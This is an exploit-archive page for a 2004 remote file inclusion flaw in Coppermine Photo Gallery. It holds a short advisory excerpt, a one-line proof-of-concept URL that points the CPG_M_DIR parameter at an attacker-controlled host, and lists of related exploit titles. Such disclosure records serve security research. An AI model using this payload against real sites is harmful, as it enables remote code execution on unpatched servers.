Menu

Search for hundreds of thousands of exploits

"Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion"

Author

Exploit author

"Janek Vind"

Platform

Exploit platform

php

Release date

Exploit published date

2004-04-30

1
2
3
4
5
6
7
source: https://www.securityfocus.com/bid/10253/info
  
Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.
  
Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible.

http://www.example.com/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2009-10-22 "Vivvo CMS 4.1.5.1 - file Disclosure" webapps php "Janek Vind"
2007-05-23 "2z Project 0.9.5 - 'rating.php' Cross-Site Scripting" webapps php "Janek Vind"
2007-04-23 "Phorum 5.1.20 - 'admin.php' Groups Module Edit/Add Group Field SQL Injection" webapps php "Janek Vind"
2007-04-23 "Phorum 5.1.20 - '/include/admin/banlist.php?delete' Cross-Site Request Forgery Banlist Deletion" webapps php "Janek Vind"
2007-04-23 "Phorum 5.1.20 - 'admin.php?module[]' Full Path Disclosure" webapps php "Janek Vind"
2007-04-23 "Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection" webapps php "Janek Vind"
2007-04-23 "Phorum 5.1.20 - 'admin.php' badwords/banlist Module SQL Injection" webapps php "Janek Vind"
2007-04-23 "Phorum 5.1.20 - 'admin.php?Groups Module group_id' Cross-Site Scripting" webapps php "Janek Vind"
2007-04-23 "Phorum 5.1.20 - 'admin.php?modsettings Module smiley_id' Cross-Site Scripting" webapps php "Janek Vind"
2007-04-23 "Phorum 5.1.20 - '/include/controlcenter/users.php' Multiple Method Privilege Escalations" webapps php "Janek Vind"
2006-02-13 "PHP-Nuke 6.x/7.x - 'header.php?Pagetitle' Cross-Site Scripting" webapps php "Janek Vind"
2004-11-16 "event Calendar - Multiple Vulnerabilities" webapps php "Janek Vind"
2004-11-11 "Phorum 5.0.x - 'FOLLOW.php' SQL Injection" webapps php "Janek Vind"
2004-06-23 "PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities" webapps php "Janek Vind"
2004-06-11 "PHP-Nuke 6.x/7.x Encyclopedia Module - Multiple Function Cross-Site Scripting Vulnerabilities" webapps php "Janek Vind"
2004-06-11 "PHP-Nuke 6.x/7.x Reviews Module - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Janek Vind"
2004-06-11 "PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities" webapps php "Janek Vind"
2004-06-11 "PHP-Nuke 6.x/7.x Reviews Module - 'order' SQL Injection" webapps php "Janek Vind"
2004-06-11 "PHP-Nuke 6.x/7.x FAQ Module - 'categories' Cross-Site Scripting" webapps java "Janek Vind"
2004-05-29 "e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting" webapps php "Janek Vind"
2004-05-29 "e107 website system 0.6 - 'usersettings.php?avmsg' Cross-Site Scripting" webapps php "Janek Vind"
2004-05-08 "Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection" webapps php "Janek Vind"
2004-05-08 "Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Janek Vind"
2004-04-30 "Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting" webapps php "Janek Vind"
2004-04-30 "Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion" webapps php "Janek Vind"
2004-04-30 "Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion" webapps php "Janek Vind"
2004-04-30 "Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Traversal Arbitrary File Access" webapps php "Janek Vind"
2004-04-23 "PHProfession 2.5 - 'upload.php' Direct Request Full Path Disclosure" webapps php "Janek Vind"
2004-04-23 "PHProfession 2.5 - 'modules.php?jcode' Cross-Site Scripting" webapps php "Janek Vind"
2004-04-23 "PHProfession 2.5 - 'modules.php?offset' SQL Injection" webapps php "Janek Vind"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.